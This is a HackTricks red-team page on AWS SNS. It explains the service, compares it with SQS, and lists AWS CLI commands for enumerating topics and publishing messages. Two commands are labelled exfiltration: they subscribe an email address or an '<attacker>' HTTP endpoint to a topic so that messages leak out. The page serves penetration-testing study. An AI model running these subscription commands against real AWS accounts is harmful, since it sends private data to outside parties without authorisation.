AWS - SNS Enum

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

SNS

Amazon Simple Notification Service (Amazon SNS) is described as a fully managed messaging service. It supports both application-to-application (A2A) and application-to-person (A2P) communication types.

Key features for A2A communication include publish/subscribe (pub/sub) mechanisms. These mechanisms introduce topics, crucial for enabling high-throughput, push-based, many-to-many messaging. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a wide range of subscriber systems, facilitating a fanout messaging pattern.

Difference with SQS

SQS is a queue-based service that allows point-to-point communication, ensuring that messages are processed by a single consumer. It offers at-least-once delivery, supports standard and FIFO queues, and allows message retention for retries and delayed processing. On the other hand, SNS is a publish/subscribe-based service, enabling one-to-many communication by broadcasting messages to multiple subscribers simultaneously. It supports various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS, and provides filtering mechanisms for targeted message delivery. While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns.

Enumeration

# Get topics & subscriptions
aws sns list-topics
aws sns list-subscriptions
aws sns list-subscriptions-by-topic --topic-arn <arn>

# Check privescs & post-exploitation
aws sns publish --region <region> \
    --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \
    --message file://message.txt

# Exfiltrate through email
## You will receive an email to confirm the subscription
aws sns subscribe --region <region> \
    --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \
    --protocol email \
    --notification-endpoint my-email@example.com

# Exfiltrate through web server
## You will receive an initial request with a URL in the field "SubscribeURL"
## that you need to access to confirm the subscription
aws sns subscribe --region <region>\
    --protocol http \
    --notification-endpoint http://<attacker>/ \
    --topic-arn <arn>

Note that if the topic is of type FIFO, only subscribers using the protocol SQS can be used (HTTP or HTTPS cannot be used).

Also, even if the --topic-arn contains the region make sure you specify the correct region in --region or you will get an error that looks like indicate that you don't have access but the problem is the region.

References

https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
Get the official PEASS & HackTricks swag
Discover The PEASS Family, our collection of exclusive NFTs
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - SES Enum NextAWS - SQS Enum

Last updated 2 months ago

SNS

Difference with SQS

Enumeration

Unauthenticated Access

Privilege Escalation

Post Exploitation

Persistence

References